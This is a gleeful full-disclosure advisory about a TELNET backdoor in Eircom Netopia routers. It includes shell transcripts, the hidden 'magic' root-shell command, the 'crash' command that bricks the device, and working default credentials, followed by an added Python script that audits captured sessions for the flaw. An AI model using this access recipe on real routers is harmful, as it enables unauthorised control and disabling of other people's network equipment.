++++++++++++++++++++
FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!
Yes, failcom suck, and they did it again. DERP!
They gave us a nice TELNET shell into their routers, and now we can
mess about 'cos it spawns a root shell by magic! (and magic is the
actual command!)
They also left a lovely web interface with supposed remote access
capability, but I have to test that fully.
Thanks to this, evil people could be hiding "in your switches
rerouting your riches!"
Disclosed by: Netcat, Hex, Chess.
++++++++++++++++++++
Netopia SOC OS version 7.8.0 has a simple TELNET backdoor.
If a malicious attacker is on the local area network of a Netopia
router, and they TELNET to 192.168.1.254 they are greeted with the
following prompt... There is no password needed!
++++++++++++++++++++
Terminal shell v1.0
Copyright ©2008 Motorola, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.8.0 (build r2)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/146306722576>
++++++++++++++++++++
If it does ask for a passphrase, we found admin/admin and
admin/password worked every time in the wild.
At the 'Admin shell' a help command gives you the following menu...
++++++++++++++++++++
Netopia-2000/146306722576> help
arp                 to send ARP request
atmping             to send ATM OAM loopback
clear               to erase all stored configuration information
clear_certificate   to clear stored SSL certificate
clear_log           to clear stored log data
configure           to configure unit's options
diagnose            to run self-test
download            to download config file
exit                to quit this shell
help                to get more: "help all" or "help help"
hotspot             to set or show hotspot authentication
info
install             to download and program an image into flash
license             to enter an upgrade key to add a feature
log                 to add a message to the diagnostic log
loglevel            to report or change diagnostic log level
netstat             to show IP information
nslookup            to send DNS query for host
ping                to send ICMP Echo request
quit                to quit this shell
reset               to reset subsystems
restart             to restart unit
show                to show system information
start               to start subsystem
status              to show basic status of unit
telnet              to telnet to a remote host
traceroute          to send traceroute probes
upload              to upload config file
view                to view configuration summary
wan_type            to Set WAN interface type
who                 to show who is using the shell
?                   to get help: "help all" or "help help"
wps                 to issue Wireless Protected Setup commands
Netopia-2000/146306722576>
++++++++++++++++++++
However, typing the command 'magic' (not listed) brings up a new
shell...
++++++++++++++++++++
Netopia-2000/146306722576> magic
(poof!)
Netopia-2000/146306722576# help
arp                 to send ARP request
atmping             to send ATM OAM loopback
brcm                to read/write broadcom switch
clear               to erase all stored configuration information
clear_certificate   to clear stored SSL certificate
clear_log           to clear stored log data
configure           to configure unit's options
diagnose            to run self-test
download            to download config file
exit                to quit this shell
help                to get more: "help all" or "help help"
hotspot             to set or show hotspot authentication
info
install             to download and program an image into flash
loopback            to set the interface in loopback mode
license             to enter an upgrade key to add a feature
log                 to add a message to the diagnostic log
loglevel            to report or change diagnostic log level
netstat             to show IP information
nslookup            to send DNS query for host
ping                to send ICMP Echo request
quit                to quit this shell
reset               to reset subsystems
restart             to restart unit
rma_count           to perform RMA functions
show                to show system information
sslclient           to send HTTPS request to the Server. Default Port is 433
start               to start subsystem
status              to show basic status of unit
telnet              to telnet to a remote host
traceroute          to send traceroute probes
upload              to upload config file
view                to view configuration summary
wan_type            to Set WAN interface type
ata                 to issue commands related to remote ATA configuration
who                 to show who is using the shell
access_code         to show if access code is valid
bootflags           to show or set the bootflags
checksum            to calculate and display the cksums
console             to make this session the console
mem                 to display or edit system memory
trace               to toggle routing tracing
crash               to cause system death
adsldebug           to debug commands
dsm                 to DSM commands
set_language        to set web display language
peer-address        to print IP address of this shell user
?                   to get help: "help all" or "help help"
wps                 to issue Wireless Protected Setup commands
Netopia-2000/146306722576#
+++++++++++++++++++++++
The 'Crash' command literally bricks the router. This shell is the
root shell.
It gets even worse though... It has a lovely web
interface if you open that web address in a browser!
+++++++++++++++++++++++
A malicious attacker on the LAN can do all kinds of things...
+++++++++++++++++++++++
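For anyone auditing a router they own, the following is an added example (not part of the original disclosure) that checks a captured TELNET session for the three conditions described above: admin access announced with no credential prompt, the Netopia SOC OS 7.8.0 banner, and the prompt changing from '>' to '#'. The transcripts are constructed from the output quoted above; the function names and the assumed shape of a credential prompt are hypothetical.

```python
import re

IAC, SB, SE = 255, 250, 240           # telnet command bytes (RFC 854)
NEGOTIATE = (251, 252, 253, 254)      # WILL, WONT, DO, DONT: each takes one option byte

def strip_telnet(raw: bytes) -> str:
    """Drop telnet option negotiation so only the text a user would see remains."""
    out, i = bytearray(), 0
    while i < len(raw):
        nxt = raw[i + 1] if i + 1 < len(raw) else None
        if raw[i] != IAC:
            out.append(raw[i]); i += 1
        elif nxt == IAC:                          # escaped literal 0xFF
            out.append(IAC); i += 2
        elif nxt == SB:                           # subnegotiation runs to IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            i = len(raw) if end < 0 else end + 2
        else:
            i += 3 if nxt in NEGOTIATE else 2
    return out.decode("latin-1")

VERSION = re.compile(r"Netopia SOC OS version (\S+)")
ADMIN = re.compile(r"Admin completed login: Full Read/Write access")
# Assumption: a credential prompt, when present, looks like "login:" / "Password:".
LOGIN = re.compile(r"(?im)^\s*(login|username|password)\s*:")
USER_PROMPT = re.compile(r"(?m)^Netopia-\S+>")
ROOT_PROMPT = re.compile(r"(?m)^Netopia-\S+#")

def audit_session(raw: bytes) -> dict:
    """Flag the conditions from the advisory in one captured session."""
    text = strip_telnet(raw)
    ver, admin, login = VERSION.search(text), ADMIN.search(text), LOGIN.search(text)
    user, root = USER_PROMPT.search(text), ROOT_PROMPT.search(text)
    return {
        "version": ver.group(1) if ver else None,
        "affected_version": bool(ver) and ver.group(1) == "7.8.0",
        # admin access announced with no credential prompt seen before it
        "admin_without_login": bool(admin) and not (login and login.start() < admin.start()),
        # '>' prompt followed later by '#' prompt: the privileged shell was entered
        "prompt_escalated": bool(user and root and user.start() < root.start()),
    }

# Constructed transcripts, built from the output quoted in the advisory.
BANNER = (b"\xff\xfb\x01\xff\xfb\x03Terminal shell v1.0\r\n"
          b"Running Netopia SOC OS version 7.8.0 (build r2)\r\n"
          b"(Admin completed login: Full Read/Write access)\r\n"
          b"Netopia-2000/146306722576> ")
ESCALATED = BANNER + b"magic\r\n(poof!)\r\nNetopia-2000/146306722576# "
PROMPTED = b"Username: admin\r\nPassword: \r\n" + BANNER[6:]

if __name__ == "__main__":
    for name, raw in (("banner", BANNER), ("escalated", ESCALATED), ("prompted", PROMPTED)):
        print(name, audit_session(raw))
```

A session that reports admin_without_login on the LAN side means TELNET management should be disabled or given a non-default password on that unit.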
ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE
VULNERABLE.
THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION
ALGORITHM'.
Not to mention, Eircom's default login is always:
eircom@eircom.net
broadband1
+++++++++++++++++++++++
Thanks for reading!
Soon to come... can we overflow BitTorrent buffers?